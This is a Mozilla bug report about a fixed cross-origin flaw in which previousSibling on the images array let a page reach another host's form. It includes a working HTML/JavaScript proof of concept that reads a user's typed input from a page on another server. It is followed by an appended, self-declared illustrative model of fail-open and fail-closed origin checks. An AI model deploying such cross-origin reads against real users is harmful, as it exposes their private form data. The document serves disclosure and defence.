Closed
Bug 22909
Opened 25 years ago
Closed 25 years ago
previousSibling vulnerability
Categories
(Core :: Security, defect, P3)
VERIFIED
FIXED
People
(Reporter: joro, Assigned: norrisboyd)
Details
previousSibling is exposed in the images array. This allows access to parts of the DOM of a document from another host. Especially bad is accessing the forms array by using images[x].previousSibling.
The code is:
------------------------read3.html-----------------------------------
<HTML>
<HEAD><TITLE>Images 2</TITLE>
</HEAD>
Type something in the INPUT element in the other window, then
<SCRIPT>
a=window.open("http://lists.nat.bg/~joro/mozilla/links2.html");
function f() {
alert("The value is:"+a.document.images[1].previousSibling.previousSibling.elements[0].value);
}
</SCRIPT>
<A HREF="javascript:f()">click here to get it</A>
</HTML>
---------------------------------------------------------------------
------------------links2.html (on another web server)---------------
<HTML>
<IMG SRC="ball.gif">
<FORM NAME="f" ACTION="#">
<INPUT TYPE="TEXT">
<INPUT TYPE="SUBMIT">
</FORM>
<IMG SRC="ball.gif">
</HTML>
---------------------------------------------------------------------
Assignee
Updated•25 years ago
Status: NEW → ASSIGNED
Assignee
Updated•25 years ago
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee
Comment 1•25 years ago
This should have been checked by the default preferences, but the mechanism got skewed. Hopefully the changes I've committed will make it harder for this to happen in the future. Until this change hits, however, all DOM property access must be considered broken.
Bulk moving all Browser Security bugs to new Security: General component. The previous Security component for Browser will be deleted.
Component: Security → Security: General
Updated•19 years ago
Flags: testcase+
Updated•17 years ago
Flags: in-testsuite+ → in-testsuite?
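The access path from the description, modelled as an added example that is not part of the original bug and is not Mozilla's code: a per-property origin check where unlisted properties fall back to a default, run with a fail-open and a fail-closed default. The check design, `guard`, `tryRead`, the policy labels, the caller URL used in testing and the sample DOM are assumptions made for illustration.

```javascript
// Added illustration, not Mozilla code: a per-property origin check on DOM
// reads. Function names, policy labels and sample data are hypothetical.
const originOf = (url) => new URL(url).origin;

// policy.rules gives a level to the properties someone listed; every other
// property (previousSibling has no rule below) gets policy.fallback.
function guard(node, nodeOrigin, callerOrigin, policy) {
  return new Proxy(node, {
    get(target, prop) {
      const level = policy.rules.get(String(prop)) ?? policy.fallback;
      if (level !== 'allAccess' && callerOrigin !== nodeOrigin) {
        throw new Error(`cross-origin read of "${String(prop)}" denied`);
      }
      const value = target[prop];
      // Re-wrap objects so the check follows the caller along the tree.
      return value !== null && typeof value === 'object'
        ? guard(value, nodeOrigin, callerOrigin, policy)
        : value;
    },
  });
}

// Constructed stand-in for links2.html: IMG, FORM, IMG with whitespace
// text nodes between them, as in the report.
function buildLinks2() {
  const form = { tagName: 'FORM', elements: [{ tagName: 'INPUT', value: 'typed text' }] };
  const nodes = [{ tagName: 'IMG' }, { nodeName: '#text' }, form,
    { nodeName: '#text' }, { tagName: 'IMG' }];
  nodes.forEach((n, i) => { n.previousSibling = nodes[i - 1] || null; });
  return { forms: [form], images: [nodes[0], nodes[4]] };
}

const LINKS2 = 'http://lists.nat.bg/~joro/mozilla/links2.html';
const RULES = new Map([['forms', 'sameOrigin']]); // only the direct route is listed
const FAIL_OPEN = { rules: RULES, fallback: 'allAccess' };
const FAIL_CLOSED = { rules: RULES, fallback: 'sameOrigin' };

// Runs walk() on a guarded node of links2.html; returns the value read or
// the denial message.
function tryRead(callerUrl, policy, pick, walk) {
  const node = guard(pick(buildLinks2()), originOf(LINKS2), originOf(callerUrl), policy);
  try { return walk(node); } catch (e) { return e.message; }
}
const wholeDoc = (doc) => doc;
const secondImage = (doc) => doc.images[1];
const viaForms = (doc) => doc.forms[0].elements[0].value;
const viaSibling = (img) => img.previousSibling.previousSibling.elements[0].value;
```

With the fail-open default the listed `forms` route is refused while the sibling walk from the image reaches the same form; with the fail-closed default the walk stops at `previousSibling`.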